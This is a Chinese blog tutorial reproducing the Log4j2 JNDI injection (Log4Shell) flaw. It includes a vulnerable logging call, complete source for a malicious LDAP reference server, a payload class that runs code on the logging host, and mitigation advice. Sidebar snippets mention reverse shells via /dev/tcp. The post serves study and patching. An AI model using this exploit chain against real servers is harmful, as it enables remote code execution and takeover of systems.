log4j2 jndi注入漏洞复现

最新推荐文章于 2024-09-18 08:49:58 发布
最新推荐文章于 2024-09-18 08:49:58 发布
阅读量1w 收藏 2
点赞数 3
分类专栏: java 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hier3/article/details/121891337
版权
本文详细解析了近期Log4j2的零日漏洞,该漏洞利用了Log4j2的日志注入特性,通过JNDI查找 LDAP 服务来执行恶意代码。复现漏洞需要模拟Java进程、RMI服务器和HTTP服务器。解决方案包括设置`-Dlog4j2.formatMsgNoLookups=true`或升级到2.15.0及以上版本。
摘要由CSDN通过智能技术生成

最近log4j2出了个zero-day的严重漏洞,为了找出复现的方法,首先需要弄懂其中的原理。

log4j2有个功能可以调用jndi来查询一些信息然后记录在日志里,这个功能本来是可以用来记录一些动态配置信息,比如访问的用户信息等,但是却成了一个漏洞。

一、jndi、ldap简介

什么是jndi呢?

援引网上的说法,jndi就是java一套资源发现和使用的接口,用来将各种资源做整合,程序员不用关心底层配置和代码实现,将资源拿来用就可以了。

什么是ldap?

ldap是一种文件访问协议,可以用来获取文件资源

log4j2在记录日志时可以用

logger.error("${jndi:ldap://127.0.0.1:1389/Print}");

这样子就会调用jndi底层的127.0.0.1:1389 rmi服务去获取 ldap的资源路径,然后从这个资源路径获取需要记录的日志信息。

二、问题复复现

问题复现需要三个组件

1、模拟服务器打日志的java进程

2、模拟rmi服务的server

3、提供下载资源的Http服务器

对于模拟服务器打日志的java进程:

package com.ccbft.JndiTest;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class JndiTest {
    public static void main(String[] args) {
        Logger logger= LogManager.getLogger(JndiTest.class);
        logger.error("${jndi:ldap://127.0.0.1:1389/Print}");
    }
}

我们简单模拟一下

对于提供rmi服务的server

网上找到了下面的代码

import java.net.InetAddress;
import java.net.MalformedURLException;
import java.net.URL;

import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;


public class LDAPRefServer {

    private static final String LDAP_BASE = "dc=example,dc=com";


    public static void main ( String[] args ) {
        int port = 1389;
        if ( args.length < 1 || args[ 0 ].indexOf('#') < 0 ) {
            System.err.println(LDAPRefServer.class.getSimpleName() + " <codebase_url#classname> [<port>]"); //$NON-NLS-1$
            System.exit(-1);
        }
        else if ( args.length > 1 ) {
            port = Integer.parseInt(args[ 1 ]);
        }

        try {
            InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
            config.setListenerConfigs(new InMemoryListenerConfig(
                "listen", //$NON-NLS-1$
                InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
                port,
                ServerSocketFactory.getDefault(),
                SocketFactory.getDefault(),
                (SSLSocketFactory) SSLSocketFactory.getDefault()));

            config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ])));
            InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
            System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
            ds.startListening();

        }
        catch ( Exception e ) {
            e.printStackTrace();
        }
    }

    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;


        /**
         * 
         */
        public OperationInterceptor ( URL cb ) {
            this.codebase = cb;
        }


        /**
         * {@inheritDoc}
         *
         * @see com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor#processSearchResult(com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult)
         */
        @Override
        public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
            String base = result.getRequest().getBaseDN();
            Entry e = new Entry(base);
            try {
                sendResult(result, base, e);
            }
            catch ( Exception e1 ) {
                e1.printStackTrace();
            }

        }


        protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws LDAPException, MalformedURLException {
            URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
            e.addAttribute("javaClassName", "foo");
            String cbstring = this.codebase.toString();
            int refPos = cbstring.indexOf('#');
            if ( refPos > 0 ) {
                cbstring = cbstring.substring(0, refPos);
            }
            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
            e.addAttribute("javaFactory", this.codebase.getRef());
            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }

    }
}

这个代码就是模拟ldap的服务器,当接收到请求时会进入到OperationInterceptor进行处理

启动参数提供一个例子

http://192.168.1.4/#Print

其中192.168.1.4是Http服务器地址

            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
            e.addAttribute("javaFactory", this.codebase.getRef());

这段代码的作用是告诉服务调用方去哪里获取资源

    static Object decodeObject(Attributes var0) throws NamingException {
        String[] var2 = getCodebases(var0.get(JAVA_ATTRIBUTES[4]));

        try {
            Attribute var1;
            if ((var1 = var0.get(JAVA_ATTRIBUTES[1])) != null) {
                ClassLoader var3 = helper.getURLClassLoader(var2);
                return deserializeObject((byte[])((byte[])var1.get()), var3);
            } else if ((var1 = var0.get(JAVA_ATTRIBUTES[7])) != null) {
                return decodeRmiObject((String)var0.get(JAVA_ATTRIBUTES[2]).get(), (String)var1.get(), var2);
            } else {
                var1 = var0.get(JAVA_ATTRIBUTES[0]);
                return var1 == null || !var1.contains(JAVA_OBJECT_CLASSES[2]) && !var1.contains(JAVA_OBJECT_CLASSES_LOWER[2]) ? null : decodeReference(var0, var2);
            }
        } catch (IOException var5) {
            NamingException var4 = new NamingException();
            var4.setRootCause(var5);
            throw var4;
        }
    }

原因是在调用方收到请求之后会调用decodeObject去解析返回结果,只有objectClass是javaNamingReference才会进入decodeReference方法。运行到这里就跟ldap服务没有关系了,接下来会去Http服务器下载对应的class文件

最后会调用getObjectFactoryFromReference方法下载class文件

然后在下面的代码去实例化获取到的class文件,所以只需要在获取的class文件的构造函数里写hack代码就可以任意操作写日志的服务器。

        return (clas != null) ? (ObjectFactory) clas.newInstance() : null;

 这里提供一个class文件

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class Print implements ObjectFactory{
    public Print(){
        System.out.println("hack");
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}

如果成功就会在写日志的服务器上打印hack。

三、解决方案

1、设置-Dlog4j2.formatMsgNoLookups=true

2、升级到2.15.0

对于第一个解决方案,尝试了2.10.0之前的版本,没有效果,

 换成2.10.0

-Dlog4j2.formatMsgNoLookups=false

 

 

2.10.0(包括)之后都有效果,2.10..0之前的最好选择升级版本

compile("org.apache.logging.log4j:log4j-api:2.10.0")
compile("org.apache.logging.log4j:log4j-core:2.10.0")

hier3
关注
专栏目录
apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1348
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocus的log4j2靶场docker,使用Kali系统进行复现实验。
log4j漏洞jndi侵入验证复现
蔷薇思绪的博客
12-13 1548
log4j的1.14.1往下版本 需要先搭建一个LDAP服务器,git地址 git clone https://github.com/mbechler/marshalsec.git 执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令 "http://127.0.0.1/fileService/download/1/1/#test" 8888 意思是将文件服务器http://127.0.0.1/fileService/download/1/1.
Log4j2JNDI注入漏洞复现测试
zhangxm_qz的博客
12-19 3064
文章目录漏洞概述代码测试防护办法 漏洞概述 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 代码测试 测试环境 我这里采用jdk1.8 211 创建并发布RMI服务 创建maven项目并,增加两个类,如下: 代码分别如下: package testRMI.service; import com.sun.jndi.rmi.registry.ReferenceWrapper; import testRMI.service.IService; import t
深入理解JNDI注入—RMI/LDAP攻击
最新发布
本散修的一些学习心得与笔记,道友请自便。
09-18 1163
透过真实漏洞来真正深入理解JNDI注入以及如何通过两种协议配合(RMI/LDAP)进行攻击。
漏洞复现 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)
菜鸟的测试世界
05-07 994
漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。 漏洞原理 利用jndi的Lookup功能,实现jndi注入命令执行 影响范围 log4j 2.0-beta9到2.15.0(1.* 版本不受影响) 复现环境 jdk: 1.8.0_181 log4j:2.14.1 OS:Win10 复现步骤 1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。 能解析${}表达式的才存在漏洞,官网的log...
JNDI注入-RMI&LDAP服务(详细完整原理篇,小白也能看得懂)
qq_68064663的博客
09-14 1517
使用jndi注入工具:JNDI-Injection-Exploit可以生成远程调用链接ldap://47.94.236.117:1389/nx5qkh,ldap://47.94.236.117:1389/nx5qkh:执行远程地址的一个class文件,功能:调用47.94.236.117的计算器。JNDI是java系统自带的api,用于访问ldap,rmi...的api,ldap和rmi是JNDI内置接口,他们这些接口可以远程调用执行一些文件,文件中可以命令执行,如调用计算器。Injection和。
JNDI注入(RMI攻击实现和LDAP攻击实现)
weixin_45682070的博客
12-12 9614
0x01 JNDI 概述 JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口) 简单一点理解就是:JNDI的做法,就是定义一个数据源,与系统外部的资源的引用 都可以通过JNDI定义和引用 JNDI可访问的现有的目录及服务有: DNS、XNam 、Novell目录服务、LDAP(Lightweight Dir
log4j2 JNDI注入漏洞问题复现
逗神的博客
12-13 4725
log4j2 JNDI注入漏洞问题复现
Apache Log4j2 lookup JNDI 注入漏洞复现(CVE-2021-44228)
qq_51331767的博客
04-02 625
在其2.0到2.14.1版本中存在一处JNDI注入漏洞,log4j的默认配置允许使用解析日志消息中的对象。攻击者可以构造恶意的日志消息,其中包含一个恶意的Java对象,当log4j尝试解析这个对象时,它将会触发漏洞,导致攻击者能够执行任意代码。通过DNSLog平台(http://www.dnslog.cn/)获取到域名http://xxxxxx,构造payload ${jndi:ldap://http://xxxxxx}这里IP是kali的IP,端口是你等会nc监听的端口。JNDI注入反弹shell。
Log4j2JNDI注入漏洞原理分析与思考
m0_69745415的博客
05-05 475
因为存在前身Log4j,而且都是Apache下的项目,不管是jar包名称还是package名称,看起来都很相似,导致有些人分不清自己用的是Log4j还是Log4j2。这里给出几个辨别方法: Log4j2分为2个jar包,一个是接口 log4j-api-版本号.jar ,一个是具体实现 log4j−core−{版本号}.jar ,一个是具体实现 log4j-core-版本号.jar ,一个是具体实现 log4j−core−{版本号}.j
Log4j2 Jndi 漏洞原理解析
课嗨教育的专栏
01-01 2590
漏洞解析、复现 Log4j2的框架设计非常优秀,各种功能均是以内部插件的方式进行的扩展实现,比如我们经常在Xml中定义的<Appenders>,实际对应的则是如下的AppendersPlugin对象 而我们在Xml Appenders下所定义的<Console>实际对应的则是如下的ConsoleAppender对象 看到这里应该就知晓了,我们在配置文件中所配置的各种元素实际上对应的均是Log4j2中的各种插件对象,Xml在被解析过程当中,会将你所配置的各种元素名..
JNDI RMI 注入Log4j2漏洞
sun0322
12-24 9558
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2漏洞JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
log4j2漏洞原理和漏洞环境搭建复现
热门推荐
dreamthe的博客
03-03 1万+
背景 2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。阿里云应急响应中心提醒 Apache Log4j2 用户尽快采取安全措施阻止漏洞攻击。 log4j3远程代码执行漏洞主要由于存在JN
Log4j2日志框架JNDI注入漏洞分析与复现
两米以下皆凡人的博客
12-14 5291
1、漏洞背景 大家在实际开发中,几乎无可避免的需要用到日志框架,不管你是前端后端客户端,他们可以追踪和记录我们的程序运行中的信息,我们可以利用日志很快定位问题,追踪分析。 而对于Java开发人员来说,最常用的日志框架便是Log4j2和logback,而本次漏洞的主角便是Apache Log4j2,它有一个特别强大的功能插件Lookups 如果我们试图通过日志去输出一个程序中不存在的对象,而在其他地方,那么我们便可以通过这个插件去通过某些方式去查找目标内容,它只提供一种规范,具体使用哪些方式去查找
JNDI操作LDAP实现(二)
xiaoli
07-15 2469
2.1 JNDI服务提供者   不使用服务提供者就不能用JNDI。一个服务提供者就是一组Java类的集合,它支持开发者同目录服务进行通信,其方式类似于JDBC驱动程序与数据库之间的通信方式。能够用于JNDI的服务提供者必须实现Context接口或Context的扩展接口Directory- Context。   在使用JNDI时,读者只需要了解JNDI,而服务提供者才关注实际的网络协议、编码/
log4j2漏洞原理详解、漏洞复现漏洞利用
Cwillchris的博客
03-13 1432
虽然/dev/tcp/${HOST}/${PORT}这个字符虽然看起来像一个文件系统中的文件,并且位于/dev这个设备文件夹下,但是这个文件并不存在,并且不是一个设备文件。这只是 bash 实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入 host port 参数,就能发起一个 socket 连接。这两组重定向,将输入,输出,报错信息都输入到/dev/tcp/192.168.1.3/6666 这里了,就相当于把整个 shell 会话,都重定向到 tcp 连接中了。
RMI、JNDILDAP介绍+log4j漏洞分析
HBohan的博客
02-28 2345
本篇主要介绍java的RMI、JNDILDAP,在后面会详细分析log4j的jndi注入原理。
核弹级漏洞,我把log4j底裤都给扒了
MachineGunJoe666
12-12 1121
大家好,我是周杰伦。 相信大家这两天应该被这么一条新闻刷屏了: 这个漏洞到底是怎么回事? 核弹级,真的有那么厉害吗? 怎么利用这个漏洞呢? 我看了很多技术分析文章,都太过专业,很多非Java技术栈或者不搞安全的人只能看个一知半解,导致大家只能看个热闹,对这个漏洞的成因、原理、利用方式、影响面理解的不到位。 这篇文章,我尝试让所有技术相关的朋友都能看懂**:这个注定会载入网络安全史册上的漏洞,到底是怎么一回事!** log4j2 不管是什么编程语言,不管是前端后端还是客户端,对打日志都不会陌生。 通过日志,
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值